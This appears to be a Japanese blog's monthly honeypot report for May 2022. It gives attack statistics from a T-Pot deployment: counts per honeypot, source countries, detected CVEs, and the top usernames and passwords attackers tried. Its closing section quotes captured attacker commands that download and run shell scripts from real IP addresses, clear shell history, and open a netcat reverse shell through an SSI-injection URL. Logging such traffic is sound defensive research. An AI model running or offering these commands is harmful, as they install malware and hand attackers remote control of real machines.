ハニーポット運用(月次報告:2022年5月)
今月のTopics
- 現地時間の5月26日にBroadcom社がVMware社を約 610 億ドルにて買収した。
- VMware社自体は1998年に創業後、2004年にEMC社に買収され、2015年にDell社に約670億ドルで買収されている。Dell社は2021年にVMwareを新会社として独立させていることから、紆余曲折があったもののまた買収されるようだ。
- VMware社自体は2022年度に赤字経営に傾いており、VMware社側にとってもメリットがある。VMware製品を利用するユーザへの影響は最小限に抑えられることを願う。
参考URL:
https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/company/vmware-broadcom.pdf
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2022年5月1日-2021年5月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 1,596,399 | -56,518 |
| 2 | Ddospot | 958,728 | 727,589 |
| 3 | Honeytrap | 908,394 | 107,980 |
| 4 | Heralding | 835,748 | 158,867 |
| 5 | Dionaea | 357,741 | 14,016 |
| 6 | Mailoney | 16,039 | -98,271 |
| 7 | Adbhoney | 14,298 | 1,686 |
| 8 | Tanner | 6,660 | 1,560 |
| 9 | Redishoneypot | 4,488 | 2,941 |
| 10 | Ciscoasa | 2,957 | 183 |
| 11 | CitrixHoneypot | 2,884 | 1,097 |
| 12 | ConPot | 2,119 | -158 |
| 13 | Medpot | 1,534 | 577 |
| 14 | ElasticPot | 886 | 122 |
| 15 | Ipphoney | 211 | 128 |
| 16 | Dicompot | 156 | 53 |
- Result
- Ddospot、Honeytrap、Heraldingのアクセス件数が増加していた。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Netherlands | 735,190 | 1(→) |
| 2 | UnitedStates | 657,151 | 4(↑) |
| 3 | China | 616,852 | 3(→) |
| 4 | Russia | 428,832 | 2(↓) |
| 5 | Japan | 277,748 | 10(↑) |
| 6 | Germany | 182,942 | 15(↑) |
| 7 | Bangladesh | 103,276 | 圏外(↑) |
| 8 | Brazil | 102,983 | 13(↑) |
| 9 | Palestine | 92,606 | 圏外(↑) |
| 10 | India | 91,008 | 9(↓) |
| 11 | Singapore | 89,891 | 8(↓) |
| 12 | SouthKorea | 84,615 | 14(↑) |
| 13 | France | 82,374 | 6(↓) |
| 14 | Vietnam | 77,827 | 11(↓) |
| 15 | Romania | 75,820 | 圏外(↑) |
| 16 | UnitedKingdom | 72,204 | 20(↑) |
| 17 | SouthAfrica | 70,191 | 圏外(↑) |
| 18 | HongKong | 53,616 | 圏外(↑) |
| 19 | Indonesia | 47,570 | 17(↓) |
| 20 | Sweden | 31,900 | 19(↓) |
- Result
- ロシアからのアクセスが減少した一方でアメリカからのアクセスが増えていた。
- 日本からのアクセスも増加傾向にあった。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 173,085 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 59 |
| 3 | CVE-2020-11910 | 28 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 127,653 |
| 2 | sa | 16,527 |
| 3 | admin | 8,218 |
| 4 | user | 6,096 |
| 5 | nproc | 6,087 |
| 6 | test | 3,515 |
| 7 | 2,212 | |
| 8 | postgres | 1,680 |
| 9 | 22 | 1,307 |
| 10 | ubuntu | 1,293 |
| 11 | oracle | 812 |
| 12 | ftpuser | 687 |
| 13 | 2Wire | 665 |
| 14 | git | 655 |
| 15 | !root | 653 |
| 16 | support | 578 |
| 17 | www | 518 |
| 18 | guest | 498 |
| 19 | web | 440 |
| 20 | mysql | 432 |
| 21 | ftp | 406 |
| 22 | adm | 391 |
| 23 | student | 356 |
| 24 | deploy | 354 |
| 25 | debug | 340 |
| 26 | 666666 | 334 |
| 27 | minecraft | 334 |
| 28 | testuser | 329 |
| 29 | 0 | 328 |
| 30 | $ALOC$ | 325 |
| 31 | administrator | 325 |
| 32 | blank | 321 |
| 33 | unknown | 321 |
| 34 | user1 | 309 |
| 35 | anonymous | 293 |
| 36 | teamspeak | 278 |
| 37 | hadoop | 268 |
| 38 | Admin | 266 |
| 39 | data | 258 |
| 40 | jenkins | 257 |
| 41 | server | 256 |
| 42 | db | 246 |
| 43 | wwwroot | 244 |
| 44 | www-data | 242 |
| 45 | tomcat | 231 |
| 46 | ts3 | 226 |
| 47 | nagios | 218 |
| 48 | test1 | 215 |
| 49 | dev | 186 |
| 50 | pi | 169 |
- Result
- 先月から変更なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | nproc | 6,087 |
| 2 | 123456 | 6,086 |
| 3 | 3,819 | |
| 4 | admin | 3,324 |
| 5 | 1 | 2,900 |
| 6 | password | 2,393 |
| 7 | 123 | 2,191 |
| 8 | 12345 | 1,437 |
| 9 | 1234 | 1,412 |
| 10 | 12345678 | 1,076 |
| 11 | root | 1,046 |
| 12 | blank | 987 |
| 13 | 0 | 764 |
| 14 | test | 694 |
| 15 | user | 534 |
| 16 | 123123 | 526 |
| 17 | qwerty | 521 |
| 18 | 666666 | 505 |
| 19 | 111111 | 461 |
| 20 | 1q2w3e4r | 455 |
| 21 | 123456789 | 454 |
| 22 | ubnt | 427 |
| 23 | 00000000 | 418 |
| 24 | master | 417 |
| 25 | 1qaz2wsx | 412 |
| 26 | pass | 403 |
| 27 | alpine | 396 |
| 28 | abc123 | 389 |
| 29 | support | 384 |
| 30 | backup | 377 |
| 31 | 1234567 | 364 |
| 32 | hi3518 | 340 |
| 33 | 123qwe | 335 |
| 34 | P@ssw0rd | 325 |
| 35 | admin123 | 308 |
| 36 | _Cisco | 304 |
| 37 | 10023 | 302 |
| 38 | synnet | 297 |
| 39 | unknown | 297 |
| 40 | !ishtar | 294 |
| 41 | test123 | 282 |
| 42 | 1234567890 | 272 |
| 43 | p@ssw0rd | 259 |
| 44 | 1qaz@WSX | 218 |
| 45 | q1w2e3r4 | 217 |
| 46 | 123321 | 216 |
| 47 | password123 | 203 |
| 48 | Passw0rd | 190 |
| 49 | qwe123 | 190 |
| 50 | changeme | 186 |
- Result
changeme(50位)はsplunkの管理者ユーザである「splunkadmin」アカウントのパスワードのようだ。利用に際しては注意が必要である。
jp.tenable.com過去のパスワード関連の記事を見るとパスワード運用の本質は10年以上前から変わっていないことが分かる。 www.itmedia.co.jp
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- MS-MSDT/Follina(CVE-2022-30190)の脆弱性にてOfficeを開いただけでRCEが発生する事象が発生しているとのこと。
- セキュリティの古典である『カッコウはコンピュータに卵を産む』 がtwitterで紹介されていたので今度読んでみたいと思う。
◆shファイルに関するアクセス "cd /tmp ; wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; yum remove wget -y ; yum install wget -y ; apt-get remove wget -y ; apt-get install wget -y ; wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh wget http://204.15.75.59/jwsn.sh "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://103.161.17.72/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 103.161.17.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c" /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e "cd /data/local/tmp/; busybox wget http://194.31.98.205/w.sh; sh w.sh; curl http://194.31.98.205/c.sh; sh c.sh", ◆exeファイルに関するアクセス なし
